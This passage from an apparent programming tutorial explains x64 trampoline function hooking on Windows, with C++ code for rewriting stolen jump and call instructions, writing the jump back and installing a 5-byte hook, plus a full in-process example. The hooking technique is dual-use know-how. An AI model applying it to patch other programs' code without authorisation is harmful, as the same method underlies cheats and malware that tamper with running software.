<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddCallToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="n">jumpBackMem</span><span class="p">);</span>
<span class="c1">//rewrite inst here</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></figure>
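<p>The backwards jump at the end of a call entry is easy to get wrong, so here’s a small sketch of the arithmetic. It works in offsets from the start of the trampoline instead of real pointers, and BackJumpDisplacement() is a hypothetical helper, not something from the project. The thing to notice is that the short jmp sits after the 13 byte absolute call, and its operand is measured from the byte after the jmp itself.</p>

```cpp
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

constexpr ptrdiff_t kAbsCallSize = 13;  // mov r10, imm64 + call r10
constexpr ptrdiff_t kShortJmpSize = 2;  // EB rel8

// Returns the rel8 operand for the short jmp that follows an absolute call in
// the AIT. Both offsets are measured from the start of the trampoline.
uint8_t BackJumpDisplacement(ptrdiff_t jumpBackOffset, ptrdiff_t aitEntryOffset)
{
    const ptrdiff_t jmpOffset = aitEntryOffset + kAbsCallSize; // the jmp is written after the call
    const ptrdiff_t nextInstr = jmpOffset + kShortJmpSize;     // rel8 is relative to this address
    const ptrdiff_t disp = jumpBackOffset - nextInstr;         // negative: we are jumping backwards
    assert(disp >= -128 && disp <= 127);                       // must fit in a signed byte
    return static_cast<uint8_t>(static_cast<int8_t>(disp));
}
```

<p>With 5 stolen bytes, the jump back starts at offset 5 and the first AIT entry at offset 18, so BackJumpDisplacement(5, 18) works out to -28, which is encoded as 0xE4.</p>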
<h3 id="step-4-rewriting-jumpscalls-to-use-the-ait">Step 4: Rewriting Jumps/Calls to Use the AIT.</h3>
<p>Adding instructions to the Absolute Instruction Table is great and all, but in order for any of that work to matter, we also need to rewrite our stolen relative instructions to actually go to the AIT. Similar to the last step, this needs to be handled differently for jumps vs calls.</p>
<p>Calls are the easier of the two to rewrite, so we’ll start with them. Since all call instructions are unconditional, we can replace any relative calls with jumps to the appropriate address inside the AIT. A 2 byte jmp instruction takes a signed 8 bit offset, so it can only reach 127 bytes forward, but our trampoline is only a few dozen bytes long, so every AIT entry falls within that range. We don’t want to change the size of the call instruction we’re rewriting, so we’ll first replace all the bytes for that instruction with NOPs. That way, if we rewrite a 5 byte call with a 2 byte jmp, we haven’t left garbage bytes in the trampoline.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">RewriteCallInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="mi">2</span><span class="p">));</span> <span class="c1">//the offset is measured from the end of the 2 byte jmp, not the end of the original call</span>
<span class="c1">//calls need to be rewritten as relative jumps to the abs table</span>
<span class="c1">//but we want to preserve the length of the instruction, so pad with NOPs</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="n">distToJumpTable</span> <span class="p">};</span>
<span class="n">memset</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="p">}</span></code></pre></figure>
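<p>To see what the rewritten bytes look like, here’s a sketch that does the same thing to a plain byte array. RewriteCallBytes() is a hypothetical helper that takes offsets from the start of the trampoline instead of pointers. It assumes the short jmp goes at the front of the slot with the NOPs behind it, so the offset is measured from the end of the 2 byte jmp.</p>

```cpp
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

constexpr size_t kShortJmpSize = 2; // EB rel8

// Overwrites a `size` byte relative call with "jmp rel8" followed by NOP padding.
// instrOffset and aitEntryOffset are byte offsets from the start of the trampoline.
void RewriteCallBytes(uint8_t* bytes, size_t size, ptrdiff_t instrOffset, ptrdiff_t aitEntryOffset)
{
    assert(size >= kShortJmpSize);
    // The CPU adds rel8 to the address of the byte after the jmp itself.
    const ptrdiff_t disp = aitEntryOffset - (instrOffset + static_cast<ptrdiff_t>(kShortJmpSize));
    assert(disp >= 0 && disp <= 127); // AIT entries sit after the stolen bytes, within rel8 range
    memset(bytes, 0x90, size);        // NOP out the whole slot first
    bytes[0] = 0xEB;                  // short jmp opcode
    bytes[1] = static_cast<uint8_t>(disp);
}
```

<p>A 5 byte call at offset 0 with its AIT entry at offset 18 becomes EB 10 90 90 90. The NOPs never execute, they just keep the instruction the same size.</p>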
<p>Jumps are more of a pain. There are a lot of different jump instructions that we might encounter, many of which are some flavor of a conditional jump. We can’t replace these instructions with a normal jmp because that could change the execution logic of our stolen bytes. Instead we need to rewrite the operands directly, so that these jumps will conditionally jump to the Absolute Instruction Table.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">RewriteJumpInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">);</span>
<span class="c1">//jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand</span>
<span class="c1">//rewrite the operand for the jump to go to the jump table</span>
<span class="kt">uint8_t</span> <span class="n">instrByteSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0x0F</span> <span class="o">?</span> <span class="mi">2</span> <span class="o">:</span> <span class="mi">1</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">operandSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span> <span class="o">-</span> <span class="n">instrByteSize</span><span class="p">;</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">operandSize</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span> <span class="p">{</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">]</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint16_t</span> <span class="n">dist16</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist16</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint32_t</span> <span class="n">dist32</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist32</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
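<p>Here’s the same idea as a standalone sketch that can be poked at without Capstone. PatchJumpOperand() is a hypothetical helper, it only handles the 1 and 4 byte operand widths, and it assumes a little-endian machine (which is a given on x64). The opcode bytes are left alone, so a je stays a je and a jne stays a jne.</p>

```cpp
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Patches the displacement of a relative jump in place, leaving the opcode
// (and therefore the condition) untouched. Returns false if the operand width
// is unexpected or the displacement does not fit.
bool PatchJumpOperand(uint8_t* bytes, size_t size, int32_t disp)
{
    const size_t opcodeSize = (bytes[0] == 0x0F) ? 2 : 1; // 0F 8x is a two byte Jcc opcode
    assert(size > opcodeSize);
    const size_t operandSize = size - opcodeSize;
    if (operandSize == 1)
    {
        if (disp < -128 || disp > 127) return false; // rel8 is a signed byte
        bytes[opcodeSize] = static_cast<uint8_t>(static_cast<int8_t>(disp));
        return true;
    }
    if (operandSize == 4)
    {
        memcpy(&bytes[opcodeSize], &disp, sizeof(disp)); // rel32, little-endian
        return true;
    }
    return false;
}
```

<p>Patching 74 05 (je) with a displacement of 20 gives 74 14, and patching 0F 85 followed by four operand bytes (jne) with 30 gives 0F 85 1E 00 00 00.</p>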
<p>The snippet below shows how these new functions should be added to BuildTrampoline(). Notice that we need to wait until after calling these new rewrite functions before we can increment the absTableMem pointer.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">uint32_t</span> <span class="nf">BuildTrampoline</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstMemForTrampoline</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">X64Instructions</span> <span class="n">stolenInstrs</span> <span class="o">=</span> <span class="n">StealBytes</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">stolenByteMem</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackMem</span> <span class="o">=</span> <span class="n">stolenByteMem</span> <span class="o">+</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numBytes</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span> <span class="o">=</span> <span class="n">jumpBackMem</span> <span class="o">+</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//13 is the size of a 64 bit mov/jmp instruction pair</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span> <span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_LOOP</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_LOOPNE</span><span class="p">){</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//bail out on loop instructions, I don't have a good way of handling them </span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeJump</span><span class="p">(</span><span class="n">inst</span><span class="p">)){</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddJmpToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">RewriteJumpInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_CALL</span><span class="p">){</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddCallToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="n">jumpBackMem</span><span class="p">);</span>
<span class="n">RewriteCallInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//write stolen instruction (rewritten or otherwise) to trampoline mem</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//write jump back to hooked func</span>
<span class="n">free</span><span class="p">(</span><span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">);</span>
<span class="k">return</span> <span class="kt">uint32_t</span><span class="p">(</span><span class="n">absTableMem</span> <span class="o">-</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
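<p>It can help to see the trampoline’s memory layout as plain numbers. The sketch below uses a hypothetical ComputeTrampolineLayout() helper to work out where each region starts and what size BuildTrampoline() would end up returning, using the sizes from the functions above: 13 bytes for an absolute jump and 15 bytes for an absolute call plus its short jmp.</p>

```cpp
#include <stdint.h>

constexpr uint32_t kAbsJumpSize = 13;      // mov r10, imm64 + jmp r10
constexpr uint32_t kAbsCallEntrySize = 15; // mov r10, imm64 + call r10 + jmp rel8

struct TrampolineLayout
{
    uint32_t jumpBackOffset; // where the jump back to the hooked function starts
    uint32_t aitOffset;      // where the first AIT entry starts
    uint32_t totalSize;      // stolen bytes + jump back + every AIT entry
};

// All offsets are relative to the start of the trampoline's memory.
TrampolineLayout ComputeTrampolineLayout(uint32_t numStolenBytes, uint32_t numRelJumps, uint32_t numRelCalls)
{
    TrampolineLayout layout;
    layout.jumpBackOffset = numStolenBytes;                  // stolen bytes come first
    layout.aitOffset = layout.jumpBackOffset + kAbsJumpSize; // AIT follows the jump back
    layout.totalSize = layout.aitOffset
        + numRelJumps * kAbsJumpSize
        + numRelCalls * kAbsCallEntrySize;
    return layout;
}
```

<p>For 7 stolen bytes containing one relative jump and one relative call, the jump back starts at offset 7, the AIT at offset 20, and the whole trampoline is 48 bytes.</p>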
<h3 id="step-5-write-the-jump-back-to-the-hooked-functions-body">Step 5: Write the Jump Back to the Hooked Function’s Body</h3>
<p>This has been a long process, but we’re almost there. Now we need to fill in the middle of the jump sandwich, and return our trampoline’s size. After all the work we’ve done so far, this last step doesn’t need much explanation. All we need to do is replace the comment in the snippet above with the following:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">jumpBackMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span></code></pre></figure>
<p>When we stole the bytes from func2hook, we also replaced them with NOP instructions. This makes our life easier here, since the jump back to our hooked function doesn’t have to care about the number of bytes we stole. Jumping to the byte immediately after the hook’s jump is guaranteed to be safe.</p>
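<p>Here’s a tiny simulation of why landing on func2hook + 5 is always fine. OverwriteStolenBytes() is a hypothetical helper that squashes two steps into one for illustration: it NOPs out every stolen byte, then writes the 5 byte hook jmp over the front. Whatever is left between the end of the jmp and the first untouched instruction is nothing but NOPs.</p>

```cpp
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

constexpr size_t kHookJmpSize = 5; // E9 rel32

// Simulates what happens to the start of the hooked function: every stolen
// byte becomes a NOP, then the hook jmp is written over the first five bytes.
void OverwriteStolenBytes(uint8_t* func, size_t numStolenBytes, const uint8_t* hookJmp)
{
    assert(numStolenBytes >= kHookJmpSize);
    memset(func, 0x90, numStolenBytes);  // NOP out everything we stole
    memcpy(func, hookJmp, kHookJmpSize); // the hook jmp covers bytes 0 to 4
}
```

<p>If 7 bytes were stolen, bytes 5 and 6 are NOPs and byte 7 is the first original instruction that was left in place, so execution resuming at offset 5 slides straight into it.</p>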
<p>Finally we return the byte count of our trampoline, so that InstallHook() can write the relay function into memory right after our trampoline bytes.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunc</span><span class="p">,</span> <span class="kt">void</span><span class="o">**</span> <span class="n">trampolinePtr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">hookMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint32_t</span> <span class="n">trampolineSize</span> <span class="o">=</span> <span class="n">BuildTrampoline</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">hookMemory</span><span class="p">);</span>
<span class="o">*</span><span class="n">trampolinePtr</span> <span class="o">=</span> <span class="n">hookMemory</span><span class="p">;</span>
<span class="c1">//create the relay function</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">hookMemory</span> <span class="o">+</span> <span class="n">trampolineSize</span><span class="p">;</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">payloadFunc</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//install the hook</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="k">const</span> <span class="kt">int32_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="kt">int32_t</span><span class="p">((</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">)));</span> <span class="c1">//subtract full-width pointers, then narrow to 32 bits</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span></code></pre></figure>
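<p>The 5 byte jmp that installs the hook only works if the relay function is within about 2GB of func2hook, which is the reason the memory gets allocated near the target in the first place. As a sketch of that constraint, the hypothetical EncodeRelativeJump32() below takes plain 64 bit addresses (so it can run anywhere) and refuses to encode a jump whose offset doesn’t fit in 32 bits.</p>

```cpp
#include <stdint.h>
#include <string.h>

// Builds "jmp rel32" (E9 + 4 byte offset) for a jump located at srcAddr that
// should land on dstAddr. Returns false if dstAddr is out of reach.
bool EncodeRelativeJump32(uint8_t* out, uint64_t srcAddr, uint64_t dstAddr)
{
    // rel32 is measured from the end of the 5 byte jmp instruction.
    const int64_t disp = static_cast<int64_t>(dstAddr) - static_cast<int64_t>(srcAddr + 5);
    if (disp < INT32_MIN || disp > INT32_MAX)
    {
        return false; // too far away for a relative jump
    }
    const int32_t rel = static_cast<int32_t>(disp);
    out[0] = 0xE9;
    memcpy(out + 1, &rel, sizeof(rel)); // little-endian offset
    return true;
}
```

<p>Jumping from 0x7ff600001000 back to 0x7ff600000000 gives an offset of -0x1005, so the encoded bytes are E9 FB EF FF FF. Asking for a target at 0x100000 from the same source fails, because that’s far more than 2GB away.</p>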
<p>aaaaand we’re done! The collapsebox below shows the full source for a program that uses this trampoline to hook a function. We’ve already talked about all the fun parts, so I’m going to leave it here without comment and move on to the grand finale.</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full Example of Trampoline Hooking a Function In The Same Process As The Hook Code</summary>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#include <stdio.h>
#include <cstdlib>
#include "capstone/x86.h"
#include "capstone/capstone.h"
#include <vector>
#include <Windows.h>
</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">noinline</span><span class="p">)</span> <span class="kt">void</span> <span class="nf">TargetFunc</span><span class="p">(</span><span class="kt">int</span> <span class="n">x</span><span class="p">,</span> <span class="kt">float</span> <span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">x</span> <span class="o">></span> <span class="mi">0</span><span class="p">)</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Target Func: x > 0</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="n">TargetFuncTrampoline</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">float</span><span class="p">)</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">HookPayload</span><span class="p">(</span><span class="kt">int</span> <span class="n">x</span><span class="p">,</span> <span class="kt">float</span> <span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hook executed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">TargetFuncTrampoline</span><span class="p">(</span><span class="n">x</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">y</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddress</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">startAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">targetAddr</span><span class="p">)</span> <span class="o">&</span> <span class="o">~</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">));</span> <span class="c1">//round down to nearest page boundary</span>
<span class="kt">uint64_t</span> <span class="n">minAddr</span> <span class="o">=</span> <span class="n">max</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMinimumApplicationAddress</span><span class="p">);</span> <span class="c1">//lower bound: the higher of the two limits</span>
<span class="kt">uint64_t</span> <span class="n">maxAddr</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">+</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMaximumApplicationAddress</span><span class="p">);</span> <span class="c1">//upper bound: the lower of the two limits</span>
<span class="kt">uint64_t</span> <span class="n">startPage</span> <span class="o">=</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span><span class="p">));</span>
<span class="kt">uint64_t</span> <span class="n">pageOffset</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">byteOffset</span> <span class="o">=</span> <span class="n">pageOffset</span> <span class="o">*</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">highAddr</span> <span class="o">=</span> <span class="n">startPage</span> <span class="o">+</span> <span class="n">byteOffset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">lowAddr</span> <span class="o">=</span> <span class="p">(</span><span class="n">startPage</span> <span class="o">></span> <span class="n">byteOffset</span><span class="p">)</span> <span class="o">?</span> <span class="n">startPage</span> <span class="o">-</span> <span class="n">byteOffset</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">needsExit</span> <span class="o">=</span> <span class="n">highAddr</span> <span class="o">></span> <span class="n">maxAddr</span> <span class="o">&&</span> <span class="n">lowAddr</span> <span class="o"><</span> <span class="n">minAddr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">highAddr</span> <span class="o"><</span> <span class="n">maxAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">highAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lowAddr</span> <span class="o">></span> <span class="n">minAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">lowAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">pageOffset</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">needsExit</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span>
